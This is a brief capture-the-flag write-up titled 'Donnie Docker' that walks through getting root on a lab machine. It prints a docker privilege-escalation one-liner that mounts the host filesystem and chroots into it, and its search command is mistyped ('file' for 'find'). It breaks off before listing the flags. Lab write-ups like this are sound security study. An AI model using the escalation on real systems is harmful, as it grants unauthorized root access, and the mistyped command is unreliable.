Donnie Docker | Forensics
From ctf description we have got credentials to ssh connection: >
ssh firstname.lastname@example.org -p 5000
After successful login with given credentials, I saw docker machine.
Firstly I checked where I am ( pwd command) and to which groups I belong ( id command).
uid=1000(user) gid=1000(user) groups=1000(user),999(docker)
I saw that I belong to docker group, so I follow this lead. I assume If I am in this group I probably could use docker commands. From previous ctf’s I known some cool website where I found how to get root shell with privileges to run docker
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
Running command above resulted with root account that gives me access to everything inside docker container. Now I have to find file with flag. >
file / -name *.txt 2>/dev/null
This command listed all files with .txt extension, which gives me some garbage and three flag.txt files:
CC BY 4.0 WaletSec + HuntClauss